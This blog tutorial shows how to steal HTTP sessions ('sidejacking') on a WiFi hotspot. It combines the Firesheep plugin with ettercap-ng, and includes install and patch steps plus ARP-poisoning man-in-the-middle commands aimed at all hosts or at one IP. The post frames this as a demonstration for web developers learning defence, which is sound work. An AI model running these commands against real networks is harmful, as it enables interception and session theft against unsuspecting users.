Sidejacking with Firesheep and Ettercap-ng

Ok, you probably read that title and thought, “what the heck is that?” Sidejacking is the name given to stealing HTTP sessions, and recently the guys over at CodeButler released a Firefox plugin, called Firesheep, which does exactly that. On its own, it’s an interesting tool for showing you how easy it is to steal a Facebook session, but combined with ettercap-ng (used to execute an ARP poisoning man-in-the-middle attack) it can steal the sessions of anyone connected to a WIFI hotspot. Every web developer should see this sort of attack in action, so they can learn to defend against it.

You all know my rig by now, MacBook Pro, so first off I’m going to grab the ettercap-ng port from DarwinPorts

(Note: most of my commands are prefixed with “sudo” as they require administrator privileges. If you prefer, you could just sudo tcsh or sudo bash to create a root shell)

$ sudo port install ettercap-ng

So I wait a few minutes while everything is downloaded and built, and eventually it finishes. Then I type:

$ ettercap

And get this…

FATAL: ARP poisoning needs a non empty hosts list.

Ack! In the build I’m using (currently the latest), there’s a problem with PCAP_TIMEOUT used in pcap_open_live(). I’m not sure why there wasn’t a more generous value used, like 1000 ms, but that’s ok – we can patch this up.

Download the patch files –

Portfile-ettercap_ng.diff (452 bytes)
patch_src_ec_capture.c (336 bytes)

Once downloaded I’m going to patch the Portfile with these changes, and reinstall a freshly patched version of ettercap-ng…

$ cd /opt/local/var/macports/sources/rsync.macports.org/release/ports/net/ettercap-ng
$ cd files
$ sudo cp ~/Downloads/patch_src_ec_capture.c .
$ cd ..
$ sudo patch -p0 < ~/Downloads/Portfile-ettercap_ng.diff
$ sudo port uninstall ettercap-ng
$ sudo port install ettercap-ng

Ok, ettercap-ng should be good to go…

$ sudo ettercap -T -q -i en1 -M ARP // //
or for a specific target…
$ sudo ettercap -T -q -i en1 -M ARP /192.168.0.100/ //

Great, 3 hosts found when scanning en1 (my Airport interface). Installing Firesheep is as simple as downloading the .xpi and dropping it onto Firefox. As for running it, just click Start Capturing! 🙂

Firesheep in action